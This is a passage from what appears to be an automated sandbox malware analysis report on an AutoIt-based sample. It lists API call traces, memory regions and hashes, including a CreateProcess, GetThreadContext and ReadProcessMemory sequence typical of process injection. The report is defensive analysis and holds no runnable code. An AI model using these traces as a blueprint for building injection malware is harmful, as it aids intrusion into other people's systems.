                                                                                        • Opcode Fuzzy Hash: 9167050c2dc4b0825c829503e55bc25cac2c16fe4eec559eca79d4812c62c980
                                                                                        • Instruction Fuzzy Hash: BAF0863560223976CB10BA95FD015DF7BE89F01315F90452FF90496282DFB89A8091DD
                                                                                        APIs
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        • __lock_file.LIBCMT ref: 004253EB
                                                                                          • Part of subcall function 00426C11: __lock.LIBCMT ref: 00426C34
                                                                                        • __fclose_nolock.LIBCMT ref: 004253F6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                        • Instruction ID: fafcd99f2ade88ab86af259f2ce8aa17897398df1327fb2dd29172a4384519b5
                                                                                        • Opcode Fuzzy Hash: 835793fb4b5a24fbea1eeed30733b59c67049ef9a82bceb899d9520eea3a16f0
                                                                                        • Instruction Fuzzy Hash: 56F09C71B026249AD710BF66780579D66E06F41378FA1914FE814E71C1CFBC49419B5E
                                                                                        APIs
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00AC5D6D
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 1263568516-0
                                                                                        • Opcode ID: 4171955f1963030196a187f3431418744cf2c98bb7d73cef8bc9512bd16f46fe
                                                                                        • Instruction ID: d76f06a4fb41ee74ba11ba5ff23debc44ffea70c96c8d04eb5a5948955ec241d
                                                                                        • Opcode Fuzzy Hash: 4171955f1963030196a187f3431418744cf2c98bb7d73cef8bc9512bd16f46fe
                                                                                        • Instruction Fuzzy Hash: 08F09655D04F00A6DD3FC378DD4DF752A605B22729F4F484DB243190F289513CC5C102
                                                                                        APIs
                                                                                        • CreateProcessW.KERNEL32(?,00000000), ref: 00D6ECAB
                                                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D6ED41
                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00D6ED63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                        • String ID:
                                                                                        • API String ID: 2438371351-0
                                                                                        • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                        • Instruction ID: 3f62441cfca8c612d8b2b9c01cd392dcd6fc6a640e144fb0f6e3fde0d417e7a1
                                                                                        • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                                        • Instruction Fuzzy Hash: F112CD24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bd25bed8f27988a623bc339674af6a2df1a6f15b9a2df7eab4c2c44e9ca6fb85
                                                                                        • Instruction ID: d726c50fbfd6378c8bd7d4a79e33fbb426512610367caf49745af8e7e070afcd
                                                                                        • Opcode Fuzzy Hash: bd25bed8f27988a623bc339674af6a2df1a6f15b9a2df7eab4c2c44e9ca6fb85
                                                                                        • Instruction Fuzzy Hash: 0071B431D0DB809EC73AC7388414F76BBA06B66360F4F869DF0959B1A2D671BDC49392
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 29e9f33e7875e0977126e5d9d9b2d016fd38b6f6527e7dca255716f6789d0561
                                                                                        • Instruction ID: 2f207b79d29aab3aaddd09a80233761d4b774dff659ea09c964e6b939f277424
                                                                                        • Opcode Fuzzy Hash: 29e9f33e7875e0977126e5d9d9b2d016fd38b6f6527e7dca255716f6789d0561
                                                                                        • Instruction Fuzzy Hash: F731D670D0C3409ACB39CB28C648F75BBB06FA1710F4F865EE0859B2E2D6759C44D792
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ProtectVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 544645111-0
                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction ID: 57d61025d726f571206bde1542701663147cad70cf876be0f0a1b4f50b8a7032
                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                        • Instruction Fuzzy Hash: 9031E7B0B001159BC71CDF0AE484A6AF7E5FB49300BA48696E40ACB356D635EDC1DB89
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                        • Instruction ID: 88ec2210b97eaeb66bd16e67604d6e353b3070822350be419431805434595ad1
                                                                                        • Opcode Fuzzy Hash: e5b39714ab5e060571701c2fd87f9e8eca858aac3ab78beea71fa84ca8624b4f
                                                                                        • Instruction Fuzzy Hash: 24414C746083419FDB14DF14C444B1ABBE1BF45318F0988ADE8999B362C739EC45CF4A
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                                        • Instruction ID: e277250e627d10e0330490a348a3b32a96e3d7cb5ffc8e96ca57e5c84c001af0
                                                                                        • Opcode Fuzzy Hash: 9020231d3715f36c038b75c9c733c79e702cd2adbd383d6332c87f1fdd559c74
                                                                                        • Instruction Fuzzy Hash: 86210072A14A19EBDB108F26E84176E7BB4FB18354F21853FE886C51D0EB38E490D74E
                                                                                        APIs
                                                                                          • Part of subcall function 00404BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00404BEF
                                                                                          • Part of subcall function 0042525B: __wfsopen.LIBCMT ref: 00425266
                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                          • Part of subcall function 00404B6A: FreeLibrary.KERNEL32(00000000), ref: 00404BA4
                                                                                          • Part of subcall function 00404C70: _memmove.LIBCMT ref: 00404CBA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Library$Free$Load__wfsopen_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 1396898556-0
                                                                                        • Opcode ID: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                        • Instruction ID: 9236aa628d2d192556c2689c07174e5c913df1e85eea92ba98d954e2704214a9
                                                                                        • Opcode Fuzzy Hash: 38ec5427debe44dbaf010247b0005924d02b12c3bdd9824270641944ab0405bf
                                                                                        • Instruction Fuzzy Hash: 8511C471600205ABCF14BF71C812FAE77A8AFC4718F10883FF641B71C1DA79AA059B99
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClearVariant
                                                                                        • String ID:
                                                                                        • API String ID: 1473721057-0
                                                                                        • Opcode ID: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                        • Instruction ID: 88ab595809d02070da327240463ca908ecab152c49247d70464b3f23f3751fdf
                                                                                        • Opcode Fuzzy Hash: a1d7634cef20e89a43ea3a6aa410385a639ea596468638af103cd2be2e177d45
                                                                                        • Instruction Fuzzy Hash: 4C214874508301DFDB14DF24C444A1ABBE1BF88314F05886DF88957762C739E815CB9B
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2311032865.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AC0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ac0000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FilePointer
                                                                                        • String ID:
                                                                                        • API String ID: 973152223-0
                                                                                        • Opcode ID: 9f3907f8e0caeb2ff5e9c544b51eed748004f416b5d75b072e5dc59894678f90
                                                                                        • Instruction ID: 189b99d5bf7d43d2d7f0b36fac52ba2a41e644ef48ee8b821c7d370c449e8bbc
                                                                                        • Opcode Fuzzy Hash: 9f3907f8e0caeb2ff5e9c544b51eed748004f416b5d75b072e5dc59894678f90
                                                                                        • Instruction Fuzzy Hash: AC018071C0D3409EC725CB348404F767BB46F56361F0F8A9EA085AB1A2D6309C44C792
                                                                                        APIs
                                                                                        • __lock_file.LIBCMT ref: 004248A6
                                                                                          • Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __getptd_noexit__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2597487223-0
                                                                                        APIs
                                                                                        • FreeLibrary.KERNEL32(?,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E7E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: FreeLibrary
                                                                                        • String ID:
                                                                                        • API String ID: 3664257935-0
                                                                                        APIs
                                                                                        • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 004207B0
                                                                                          • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: LongNamePath_memmove
                                                                                        • String ID:
                                                                                        • API String ID: 2514874351-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wfsopen
                                                                                        • String ID:
                                                                                        • API String ID: 197181222-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2314927041.0000000000D6D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D6D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_d6d000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: Sleep
                                                                                        • String ID:
                                                                                        • API String ID: 3472027048-0
                                                                                        APIs
                                                                                          • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CB37
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CB95
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048CBD6
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CC00
                                                                                        • SendMessageW.USER32 ref: 0048CC29
                                                                                        • _wcsncpy.LIBCMT ref: 0048CC95
                                                                                        • GetKeyState.USER32(00000011), ref: 0048CCB6
                                                                                        • GetKeyState.USER32(00000009), ref: 0048CCC3
                                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CCD9
                                                                                        • GetKeyState.USER32(00000010), ref: 0048CCE3
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CD0C
                                                                                        • SendMessageW.USER32 ref: 0048CD33
                                                                                        • SendMessageW.USER32(?,00001030,?,0048B348), ref: 0048CE37
                                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048CE4D
                                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048CE60
                                                                                        • SetCapture.USER32(?), ref: 0048CE69
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048CECE
                                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048CEDB
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048CEF5
                                                                                        • ReleaseCapture.USER32 ref: 0048CF00
                                                                                        • GetCursorPos.USER32(?), ref: 0048CF3A
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048CF47
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048CFA3
                                                                                        • SendMessageW.USER32 ref: 0048CFD1
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D00E
                                                                                        • SendMessageW.USER32 ref: 0048D03D
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D05E
                                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D06D
                                                                                        • GetCursorPos.USER32(?), ref: 0048D08D
                                                                                        • ScreenToClient.USER32(?,?), ref: 0048D09A
                                                                                        • GetParent.USER32(?), ref: 0048D0BA
                                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D123
                                                                                        • SendMessageW.USER32 ref: 0048D154
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048D1B2
                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D1E2
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D20C
                                                                                        • SendMessageW.USER32 ref: 0048D22F
                                                                                        • ClientToScreen.USER32(?,?), ref: 0048D281
                                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D2B5
                                                                                          • Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0048D351
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                                        • String ID: @GUI_DRAGID$F$pbL
                                                                                        • API String ID: 3977979337-2097280626
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2309816353.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2309746617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2309924724.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310015127.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310096231.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310214331.0000000000525000.00000080.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.2310265518.000000000052C000.00000040.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000_OVZizpEU7Q.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove$_memset
                                                                                        • String ID: ]K$3cA$DEFINE$P\K$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_A
                                                                                        • API String ID: 1357608183-1426331590
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(00000000,?), ref: 004048DF
                                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043D665
                                                                                        • IsIconic.USER32(?), ref: 0043D66E
                                                                                        • ShowWindow.USER32(?,00000009), ref: 0043D67B
                                                                                        • SetForegroundWindow.USER32(?), ref: 0043D685
                                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043D69B
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0043D6A2
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043D6AE
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6BF
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0043D6C7
                                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 0043D6CF
                                                                                        • SetForegroundWindow.USER32(?), ref: 0043D6D2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6E7
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D6F2
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D6FC
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D701
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D70A
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D70F
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043D719
                                                                                        • keybd_event.USER32(00000012,00000000), ref: 0043D71E
                                                                                        • SetForegroundWindow.USER32(?), ref: 0043D721
                                                                                        • AttachThreadInput.USER32(?,?,00000000), ref: 0043D748
                                                                                        Strings
                                                                                        Memory Dump Source
